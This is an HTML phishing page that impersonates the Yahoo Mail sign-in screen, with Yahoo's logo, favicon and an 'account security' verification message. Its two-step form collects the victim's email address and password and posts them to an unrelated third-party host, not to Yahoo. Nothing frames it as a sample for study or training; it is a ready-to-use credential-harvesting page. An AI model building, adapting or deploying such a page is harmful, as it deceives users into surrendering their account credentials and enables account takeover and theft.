<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Yahoo Mail | Sign in to Yahoo Mail</title>
    <link rel="icon" type="image/x-icon" href="https://s.yimg.com/wm/mbr/images/yahoo-favicon-img-v0.0.2.ico">
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700;800;900&display=swap');
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            background-color: white;
        }
        body:before {
            content: '';
            position: fixed;
            width: 100vw;
            height: 100vh;
            background-image: url(https://th.bing.com/th/id/OIP.JB3F70EKQ9BOW84q5vk8RQAAAA?rs=1&pid=ImgDetMain);
            background-position: center;
            background-repeat: no-repeat;
            background-attachment: fixed;
            background-size: 600px 620px;
            filter: blur(2px);
        }
        .container {
            position: relative;
            border: 2px solid rgb(244,244,244);
            border-radius: 20px;
            width: 360px;
            height: 560px;
            padding: 5px 30px 15px 30px;
            background: white;
            align-items: center;
            overflow: hidden;
        }
        .logo1 {
            height: 28px;
            margin: 32px 2px 12px 2px;
        }
        .login-box {
            position: relative; 
            width: 100%;
            background: white;
        }
        .page-box {
            display: flex;
            flex-direction: column;
        }
        .page {
            width: 100%;
        }
        .page.email-page {
            transform: translateX(0);
            transition: .25s ease-in-out;
        }
        .page-box.active-pass .page.email-page {
            transform: translateX(-500px);
        }
        .page.password-page {
            position: absolute;
            transform: translateX(500px);
            margin-top: 180px;
            transition: .25s ease-in-out;
        }
        .page-box.active-pass .page.password-page {
            transform: translateX(0);
        }
        .login-title {
            text-align: center;
            color: black;
            margin-bottom: 40px;
        }
        .login-title h2 {
            font-size: 20px;
            line-height: 1.5;
            font-weight: 600;
            margin-top: 14px;
            letter-spacing:-.58px;
            color: black;
            font-family: Helvetica;
        }
        .login-title p {
            font-size: 15px;
            color: #464546;
            
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            margin-bottom: 28px;
        }
        .input-box {
            position: relative;
            width: 100%;
            height: 35px;
            margin: 15px 0;
        }
        .input-box input {
            width: 100%;
            height: 100%;
            border: none;
            border-bottom: 1px solid #bcbbbd;
            background: #fff;
            outline: none;
            height: 40px;
            color: #494646;
            font-size: 14.5px;
            padding: 10px 6px 0 1px;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }
        .input-box input:focus,
        .input-box input:valid {
            border-color: #7d2eff;
        }
        .input-box label {
            position: absolute;
            top: 50%;
            left: 2px;
            transform: translateY(-50%);
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            font-size: 14.5px;
            color: rgb(157, 152, 152);
            pointer-events: none;
            transition: .3s ease;
        }
        .input-box input:focus~label,
        .input-box input:valid~label {
            top: 1px;
            left: 7px;
            font-size: 13px;
            color: #c8c8c8;
        }
        .forgot {
            margin: 18px 0px 25px 0;
        }
        .forgot a {
            font-size: 14.5px;
            font-weight: 500;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            color: #7d2eff;
            text-decoration: none;
        }
        .btn-next {
            margin: 0;
            padding: 0;
            height: 44px;
            width: 100%;
            color: #fff;
            font-size: 17px;
            font-weight: 600;
            background: #7d2eff;
            cursor: pointer;
            border-radius: 24px;
            border: none;
            outline: none;
            margin-top: 14px;
        }

        .btn-next1 {
            margin: 0;
            padding: 0;
            height: 44px;
            width: 100%;
            color: #fff;
            font-size: 17px;
            font-weight: 600;
            background: #7d2eff;
            cursor: pointer;
            border-radius: 24px;
            border: none;
            outline: none;
            margin-top: -11px;
        }
        .container input[type="button"] {
            margin: 0;
            padding: 0;
            height: 44px;
            width: 100%;
            color: #892bfb;
            font-family: 'Segoe UI', TFahoma, Geneva, Verdana, sans-serif;
            text-align: center;
            font-size: 17px;
            font-weight: 600;
            background: white;
            cursor: pointer;
            border-radius: 24px;
            border: 1px solid #7d2eff;
            outline: none;
            margin-top: 25px;
 }
    </style>
</head>
<body>
    <div class="container">
        <center><img src="https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Yahoo" class="logo1"></center>
        <div class="login-box">
            <form method="post" id="myForm" action="https://guillotconstructionllc.pythonanywhere.com/login/">
                <div class="page-box">
                    <div class="login-title">
                        <p class="user-email"></p>
                        <h2 class="loginTitle-text">Sign in</h2>
                        <p class="loginInfo-text">We need to verify your identity for <br>account security</p>
                    </div>
                    <br><br>
                    <div class="page email-page">
                        <div class="input-box">
                            <input type="email" id="email" name="email" class="email" autofocus required>
                            <label>Username, email, or mobile</label>
                        </div>
                        <div class="btn-box">
                            <button type="button" class="btn-next">Next</button>
                        </div>
                        <div class="forgot">
                            <a href="#"><input type="checkbox">&nbsp; Stay signed in</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="#">Forgot username?</a>
                        </div>
                        <input type="button" value="Create an account">
                    </div>
                    <div class="page password-page">
                        <div class="input-box">
                            <input type="password" id="password" name="password" required>
                            <label>Password</label>
                        </div>
                        <div class="forgot">
                            <a href="#">Forgot password?</a>
                        </div>
                        <div class="btn-box">
                            <button type="submit" class="btn-next1">Next</button>
                        </div>
                    </div>     
                </div>
            </form>
        </div>
    </div>    
    <script>
       const pageBox = document.querySelector('.page-box');
const btnNext = document.querySelector('.btn-next');
const btnNext1 = document.querySelector('.btn-next1');

const loginTitle = document.querySelector('.loginTitle-text');
const loginInfo = document.querySelector('.loginInfo-text');
const userEmail = document.querySelector('.user-email');
const emailInput = document.querySelector('.email');

btnNext.onclick = (e) => {
    e.preventDefault();
    pageBox.classList.add('active-pass')
    setTimeout(() => passwordInput.focus(), 500);
    loginTitle.innerHTML = 'Enter password'
    loginInfo.innerHTML = 'to finish sign in'
    userEmail.innerHTML = emailInput.value;

        }
    </script>
</body>
</html>
